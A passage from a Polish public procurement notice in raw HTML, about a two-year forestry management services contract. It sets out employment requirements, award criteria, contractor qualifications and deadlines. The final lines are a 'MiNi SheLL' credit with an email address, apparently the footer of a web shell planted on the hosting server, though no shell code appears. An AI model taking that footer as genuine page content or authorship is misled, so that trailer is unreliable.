wyposażone stanowisko pracy biurowej, z dostępem do podstawowych urządzeń technicznych, w tym komputera, kopiarki, telefonu, umożliwiające wykonywanie czynności w zakresie przewidzianym umową,<br/>- wysyłanie i odbiór korespondencji związanej z świadczoną usługą, <br/>- kompletowanie i udostępnianie niezbędnych dla danej sprawy dokumentów źródłowych.<br/>e)	pozostałe warunki realizacji zamówienia opisane zostały w istotnych postanowieniach umownych, stanowiących załącznik do SWZ.<br/><br/>W oparciu o art. 121 Ustawy prawo zamówień publicznych, Zamawiający zastrzega obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia. Kluczową częścią zamówienia dla Zamawiającego jest pełnienie dyżuru w siedzibie Zamawiającego. Zamawiający dopuszcza możliwość pełnienia dyżuru przez maksymalnie jedną osobę.<br/><br/>Zamawiający informuje, że średnio na miesiąc do wykonania przedmiotu zamówienia wykonawca będzie pokonywał trasę ok. 1500 km własnym środkiem transportu. <br/><br/>10.	Zatrudnienie pracowników na umowę o pracę:<br/>1)	Zamawiający na podstawie art. 95 ustawy PZP wymaga, a Wykonawca zobowiązuje się przy realizacji umowy, do zatrudniania na podstawie umowy o pracę w rozumieniu przepisów Ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (t.j. Dz.U. 2020. 1320), we własnym przedsiębiorstwie lub przedsiębiorstwie podwykonawcy, osób wykonujących następujące czynności w zakresie realizacji zamówienia - usług wymienionych w ust. 8 pkt. 1), 3), 4), 5), 6)<br/>2)	W celu dokumentowania zatrudnienia osób, o których mowa w art. art. 95 ustawy PZP Wykonawca przedłoży Zamawiającemu wykaz osób, które będą wykonywały czynności wymienione w ust. 8 pkt. 1), 3), 4), 5), 6) z określeniem okresu ich zatrudniania oraz wymiaru czasu pracy (równoznaczne z ilością godzin świadczonych usług wskazanych w ofercie), ustalonych w umowie o pracę, zarówno z Wykonawcą jak i z podwykonawcą. Wykaz zostanie złożony najpóźniej w dniu przed podpisaniem umowy. Następnie na każde pisemne wezwanie Zamawiającego, Wykonawca będzie zobligowany przedstawić w terminie 2 dni roboczych, kopie dokumentów potwierdzających zatrudnienie osób na umowę o pracę przy realizacji zamówienia (w tym zanonimizowane – za wyjątkiem imienia i nazwiska – umożliwiające identyfikację umowy o pracę, dokumenty potwierdzające opłacanie składek na ubezpieczenie społeczne i zdrowotne, z tytułu zatrudnienia na umowę o pracę, np. zaświadczenie ZUS, dokumenty potwierdzające zgłoszenie pracownika do opłacania składek). <br/>3)	Zamawiający będzie miał prawo do sprawdzenia tożsamości pracownika, wykonującego czynności wskazane w ust. 8 pkt. 1), 3), 4), 5), 6) i sprawdzenia zgodności z przedstawionym Zamawiającemu wykazem osób. Niespełnienie wymagań, o których mowa jak wyżej skutkować będzie naliczeniem kar umownych oraz będzie stanowiło podstawę rozwiązania umowy.<br/>4)	W przypadku wystąpienia zmian dot. zatrudnienia osób wykonujących czynności wskazane przez Zamawiającego do wykonania na podstawie umowy o pracę, Wykonawca ma obowiązek w terminie 7 dni od ich zaistnienia zgłosić na piśmie każdą zamianę Zamawiającemu. Wykonawca zobowiązany jest do przekazania Zamawiającemu nowego wykazu osób zatrudnionych przy realizacji zamówienia na podstawie umowy o pracę wraz ze wskazaniem czynności które będą oni wykonywać.<br/>5)	W przypadku osób prowadzących jednoosobową działalność gospodarczą lub wspólników spółek osobowych oraz kapitałowych niezatrudniających pracowników, Zamawiający zastrzega, że czynności w zakresie realizacji przedmiotu zamówienia określone w ust. 8 pkt. 1), 3), 4), 5), 6) wykonają osobiście osoby prowadzące jednoosobową działalność gospodarczą, wspólnicy spółek kapitałowych. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 114923,58 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77231100-9 - Usługi zarządzania zasobami leśnymi</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający będzie oceniał oferty według następujących kryteriów:<br/>1.Kryterium „Cena” – waga 60 %,<br/>2.Kryterium „Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia” – waga 40 %,<br/>Sposób przyznania punktów opisano w z rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kwalifikacje zawodowe i doświadczenie osób wyznaczonych do bezpośredniej realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.	Na podstawie art. 112 ustawy Pzp, zamawiający określa warunki udziału w postępowaniu dotyczące: <br/>1)	zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie stawia szczególnych wymagań w tym zakresie;<br/>2)	uprawnień do prowadzenia określonej działalności zawodowej, o ile to wynika z odrębnych przepisów<br/>Zamawiający nie stawia szczególnych wymagań w tym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczególnych wymagań w tym zakresie;<br/>4) zdolności technicznej lub zawodowej<br/>Niniejszy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że:<br/>4.1)	w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, lub wykonuje przynajmniej jedną usługę, trwającą przynajmniej 12 miesięcy o wartości przynajmniej 60 000,00 zł brutto, w ramach której :<br/>a)	Uzyskał przynajmniej 10 decyzji/zezwoleń na wycinkę drzew na podstawie ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody lub przynajmniej przez 12 miesięcy nadzorował prace w zakresie wycinki drzew na podstawie obowiązujących planów urządzania lasu/ uproszczonych planów urządzania lasu/ inwentaryzacji stanu lasu w oparciu ustawę z dnia 28 września 1991 r. o lasach <br/>b)	Wykonał przynajmniej 10 kwalifikacji drewna jako użytkowego bądź opałowego na podstawie oględzin drzew według ustalonych wad drewna i jego przydatności<br/>c)	Wykonał przynajmniej 10 usług cechowania drewna według systemu płytkowego wraz ze sporządzeniem dokumentów dot. legalności pozyskania drewna.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie uznany za spełniony, jeżeli jeden z wykonawców wykaże się całym wymaganym doświadczeniem. Zamawiający nie uzna warunku za spełniony, jeżeli wszyscy uczestnicy w sumie wykażą się wymaganym doświadczeniem, ale żaden z nich indywidualnie go nie wykaże.<br/>4.2)	dysponuje osobami, skierowanymi do realizacji zamówienia, posiadającymi następujące kwalifikacje tj.: co najmniej wykształcenie średnie oraz przynajmniej 12 miesięczne doświadczenie w zarządzaniu zasobami leśnymi w następującym zakresie:<br/>a)	Uzyskał przynajmniej 10 decyzji/zezwoleń na wycinkę drzew na podstawie ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody (Dz.U.2020.0.55) lub przynajmniej przez 12 miesięcy nadzorował prace w zakresie wycinki drzew na podstawie obowiązujących planów urządzania lasu/ uproszczonych planów urządzania lasu/ inwentaryzacji stanu lasu w oparciu ustawę z dnia 28 września 1991 r. o lasach (Dz.U.2020.0.6)<br/>b)	Wykonał przynajmniej 10 kwalifikacji drewna jako użytkowego bądź opałowego na podstawie oględzin drzew według ustalonych wad drewna i jego przydatności<br/>c)	Wykonał przynajmniej 10 usług cechowania drewna według systemu płytkowego wraz ze sporządzeniem dokumentów dot. legalności pozyskania drewna.<br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie uznany za spełniony, jeżeli jeden z wykonawców spełni warunek samodzielnie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty, każdy wykonawca musi dołączyć oświadczenie o niepodleganiu wykluczeniu - zgodne co do treści z Załącznikiem nr 2 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych:<br/>1)	wykazu wykonanych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie potwierdzającego należyte wykonanie lub wykonywanie przynajmniej jednej usługi, trwającą przynajmniej 12 miesięcy, o wartości przynajmniej 60 000,00 zł brutto zł w ramach której: <br/>a)	Uzyskał przynajmniej 10 decyzji/zezwoleń na wycinkę drzew na podstawie ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody (Dz.U.2020.0.55) lub przynajmniej przez 12 miesięcy nadzorował parce w zakresie wycinki drzew na podstawie obowiązujących planów urządzania lasu/ uproszczonych planów urządzania lasu/ inwentaryzacji stanu lasu w oparciu ustawę z dnia 28 września 1991 r. o lasach (Dz.U.2020.0.6)<br/>b)	Wykonał przynajmniej 10 kwalifikacji drewna jako użytkowego bądź opałowego na podstawie oględzin drzew według ustalonych wad drewna i jego przydatności<br/>c)	Wykonał przynajmniej 10 usług cechowania drewna według systemu płytkowego wraz ze sporządzeniem dokumentów dot. legalności pozyskania drewna.<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy<br/>2)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami tj. wykonawca winien wykazać się dysponowaniem co najmniej jedną osobą (wyznaczoną do realizacji zamówienia – pełnienia dyżurów) z wykształceniem co najmniej średnim oraz przynajmniej 12 miesięczne doświadczeniem w zarządzaniu zasobami leśnymi w następującym zakresie: <br/>a)	Uzyskał przynajmniej 10 decyzji/zezwoleń na wycinkę drzew na podstawie ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody (Dz.U.2020.0.55) lub przynajmniej przez 12 miesięcy nadzorował parce w zakresie wycinki drzew na podstawie obowiązujących planów urządzania lasu/ uproszczonych planów urządzania lasu/ inwentaryzacji stanu lasu w oparciu ustawę z dnia 28 września 1991 r. o lasach (Dz.U.2020.0.6)<br/>b)	Wykonał przynajmniej 10 kwalifikacji drewna jako użytkowego bądź opałowego na podstawie oględzin drzew według ustalonych wad drewna i jego przydatności<br/>c)	Wykonał przynajmniej 10 usług cechowania drewna według systemu płytkowego wraz ze sporządzeniem dokumentów dot. legalności pozyskania drewna.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>W taki przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o niepodleganiu wykluczeniu z postępowania oraz spełniania warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu składa każdy z wykonawców. Pozostałe szczegółowe informacje znajdują się w Rozdziale X SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia opisano w projektowanych<br/>postanowienia umownych stanowiących załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-25 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kowr.eb2b.com.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-25 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.W kryterium „CENA” wykonawca może uzyskać maksymalnie 60 pkt. Najwyższą ilość punktów uzyska oferta zawierająca najniższą cenę, pozostałe oferty proporcjonalnie mniej. Zamawiający przyjmie do obliczeń cenę oferty podaną w Formularzu oferty. Liczba punktów dla poszczególnych ofert zostanie wyliczona według następującego wzoru:<br/>C (uzyskana ilość punktów w kryterium „CENA”) = Cn (najniższa cena spośród ofert podlegających ocenie/ Cb (cena badanej oferty) x 60 pkt<br/>2.W kryterium „KWALIFIKACJE ZAWODOWE I DOŚWIADCZENIE OSÓB WYZNACZONYCH DO BEZPOŚREDNIEJ REALIZACJI ZAMÓWIENIA” Wykonawca może uzyskać maksymalnie 40 pkt:<br/>Ocena nastąpi na podstawie wskazanych przez wykonawcę w formularzu ofertowym kwalifikacji zawodowych oraz doświadczenia osób wyznaczonych do bezpośredniej realizacji zamówienia (pełnienia dyżuru) w następujący sposób:<br/>•	Wykonawca otrzyma punkty w niniejszym kryterium w przypadku wskazania, iż kwalifikacje zawodowe osób wyznaczonych do bezpośredniej realizacji zamówienia (pełnienia dyżuru) wykraczają ponad minimalne wymagane, określone w rozdziale XV SWZ ust. 6 tj. w przypadku wskazania:<br/>a)	wykształcenia średniego o kierunku leśnym – 10 pkt<br/>b)	wykształcenia wyższego o kierunku leśnym – 20 pkt <br/>•	Wykonawca otrzyma punkty w niniejszym kryterium w przypadku wskazania, doświadczenia zawodowego osoby wyznaczonej do bezpośredniej realizacji zamówienia (pełnienia dyżuru) wykraczającej ponad minimalne wymagane 12 miesięcy, określone w rozdziale XV SWZ ust. 6 tj. w przypadku wykazania doświadczenia większego o każdy miesiąc ponad wymagane 12 miesięcy wykonawca otrzyma dodatkowy 1 punkt. Maksymalnie wykonawca może otrzymać 20 pkt w przypadku wykazania 32 miesięcznego lub większego doświadczenia osoby wyznaczonej do bezpośredniej realizacji zamówienia (pełnienia dyżuru)

Creat By MiNi SheLL
Email: jattceo@gmail.com